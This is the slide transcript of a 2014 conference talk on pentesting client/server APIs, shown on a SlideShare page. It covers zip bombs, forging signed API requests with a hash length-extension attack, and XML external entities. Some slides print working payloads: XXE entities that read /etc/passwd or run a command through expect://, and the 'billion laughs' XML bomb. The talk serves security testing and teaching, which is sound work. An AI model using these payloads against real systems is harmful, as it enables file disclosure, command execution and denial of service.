CodeFest 2014 - Pentesting client/server API
Upcoming SlideShare
Loading in...5
×
 

CodeFest 2014 - Pentesting client/server API

on

  • 17,286 views

http://2014.codefest.ru/lecture/696

http://2014.codefest.ru/lecture/696

Statistics

Views

Total Views
17,286
Views on SlideShare
883
Embed Views
16,403

Actions

Likes
0
Downloads
7
Comments
0

21 Embeds 16,403

http://habrahabr.ru 16091
http://m.habrahabr.ru 191
http://feedly.com 29
http://savepearlharbor.com 26
http://testers.lviv.ua 25
http://www.slideee.com 6
http://www.pvsm.ru 6
http://digg.com 6
http://gigamir.net 4
http://stroylegko.dev 4
http://www.inoreader.com 2
http://rss4kindle.com.ua 2
http://sohabr.ru 2
http://www.peeep.us 2
http://habrahabr.ru. 1
http://reader.aol.com 1
http://flyffrus.dyndns.org 1
http://f.3lp.cx 1
http://ereader.dev 1
http://wbms.yandex.net 1
http://webcache.googleusercontent.com 1
More...

Accessibility

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

CodeFest 2014 - Pentesting client/server API CodeFest 2014 - Pentesting client/server API Presentation Transcript

  • Pentesting client/server API Sergey Belov
  • $ whoami © 2002—2014, Digital Security 2 • Senior Security Auditor at Digital Security • BugHunter: Google, Yandex, Badoo, Yahoo +++ • Writer: habrahabr, Xakep magazine • CTF: DEFCON 2012 CTF Final, Chaos Construction CTF’2013 • Speaker: CodeFest 2012, ZeroNights 0x03 • Trainer: Hack in Paris’2014, BlackHat’2014 USA (soon)
  • What are we talking about? © 2002—2014, Digital Security 3 API
  • What are we talking about? © 2002—2014, Digital Security 4 API
  • Hacking via API © 2002—2014, Digital Security 5
  • Hacking via API © 2002—2014, Digital Security 6
  • Hacking via API © 2002—2014, Digital Security 7 From interface to API methods
  • Hacking via API © 2002—2014, Digital Security 8
  • Hacking via API © 2002—2014, Digital Security 9
  • Hacking via API © 2002—2014, Digital Security 10
  • Hacking via API © 2002—2014, Digital Security 11
  • Hacking via API © 2002—2014, Digital Security 12 What should we test? • Logic! • Bypassing restrictions (sqli/xss) • Parameter tampering Developing • Stop hacks and custom implementation in API! Really
  • Hacking via API © 2002—2014, Digital Security 13
  • Hacking via API © 2002—2014, Digital Security 14 ZIP
  • Hacking via API © 2002—2014, Digital Security 15 42 Kb…
  • Hacking via API © 2002—2014, Digital Security 16 42 Kb… …10 Gb?
  • Hacking via API © 2002—2014, Digital Security 17 42 Kb… …10 Gb? …100 Gb?
  • Hacking via API © 2002—2014, Digital Security 18 42 Kb… …10 Gb? …100 Gb? …100 Tb?
  • Hacking via API © 2002—2014, Digital Security 19 42 Kb… …10 Gb? …100 Gb? …100 Tb? …4.5 Pb! http://www.unforgettable.dk/
  • Hacking via API © 2002—2014, Digital Security 20 Say HELLO to ZIP BOMB!
  • Hacking via API © 2002—2014, Digital Security 21 The evil of JavaScript and
  • Hacking via API © 2002—2014, Digital Security 22
  • Hacking via API © 2002—2014, Digital Security 23
  • Hacking via API © 2002—2014, Digital Security 24 http://habrahabr.ru/post/186160/
  • Hacking via API © 2002—2014, Digital Security 25 Crypto
  • Hacking via API © 2002—2014, Digital Security 26 Query signing Sign = sha*(…+DATA+…) APIkey
  • Hacking via API © 2002—2014, Digital Security 27
  • Hacking via API © 2002—2014, Digital Security 28 But why?
  • Hacking via API © 2002—2014, Digital Security 29 Say hello again. To length extension attack
  • Hacking via API © 2002—2014, Digital Security 30 A=1&B=2&C=3 07ce36c769ae130708258fb5dfa3d37ca5a67514 TOKEN=sha1(KEY+DATA)
  • Hacking via API © 2002—2014, Digital Security 31 Some have hijacked just 1 request…
  • Hacking via API © 2002—2014, Digital Security 32 What does the attacker know? • Original data • Sign (token)
  • Hacking via API © 2002—2014, Digital Security 33 What does the attacker want? Change some data / change params
  • Hacking via API © 2002—2014, Digital Security 34 A=1&B=2&C=3x80x00x00…x02&C=4
  • Hacking via API © 2002—2014, Digital Security 35 Can sign new query without API key! Vkontakte: sig = md5(name1=value1name2=value2api_secret) Mail.RU sig = md5(uid + params + private_key) http://www.vnsecurity.net/2010/03/codegate_challenge15_sha1_padding_attack
  • Hacking via API © 2002—2014, Digital Security 36 Request hijacking… How?
  • Hacking via API © 2002—2014, Digital Security 37
  • Hacking via API © 2002—2014, Digital Security 38
  • Hacking via API © 2002—2014, Digital Security 39
  • Hacking via API © 2002—2014, Digital Security 40
  • Hacking via API © 2002—2014, Digital Security 41
  • Hacking via API © 2002—2014, Digital Security 42
  • Hacking via API © 2002—2014, Digital Security 43
  • Hacking via API © 2002—2014, Digital Security 44
  • Hacking via API © 2002—2014, Digital Security 45 XML? XML entities!
  • Hacking via API © 2002—2014, Digital Security 46 DTD Example: <!ENTITY writer "Donald Duck."> <!ENTITY copyright "Copyright W3Schools."> XML example: <author>&writer;&copyright;</author>
  • Hacking via API © 2002—2014, Digital Security 47 XML entities? External Entity!
  • Hacking via API © 2002—2014, Digital Security 48 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <foo>&xxe;</foo>
  • Hacking via API © 2002—2014, Digital Security 49 <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id" >]> <foo>&xxe;</foo>
  • Hacking via API © 2002—2014, Digital Security 50 XML Bombs!
  • Hacking via API © 2002—2014, Digital Security 51 <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
  • What are we talking about? © 2002—2014, Digital Security 52 Man in the Middle
  • Hacking via API © 2002—2014, Digital Security 53 Examples?
  • Hacking via API © 2002—2014, Digital Security 54 2013-11-19 by Reginaldo Silva
  • Hacking via API © 2002—2014, Digital Security 55 https://www.facebook.com/BugBounty/posts/778897822124446 http://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution
  • Hacking via API © 2002—2014, Digital Security 56 Testing: • https://www.owasp.org/index.php/Testing_for_XML_Injection_(OWASP-DV-008) • XXE to RCE https://gist.github.com/joernchen/3623896 Development: • Disable entities
  • Hacking via API © 2002—2014, Digital Security 57 Finally: • Re-test all interface restrictions; • Specific compressions; • JS callbacks; • Crypto + SSL test + hardcoded credentials (hackapp.com); • XML - XXE; • Anything else :]
  • twitter.com/sergeybelove sbelov@dsec.ru Digital Security в Москве: (495) 223-07-86 Digital Security в Санкт-Петербурге: (812) 703-15-47 Hacking via API Thanks for your attention! Questions? © 2002—2014, Digital Security 58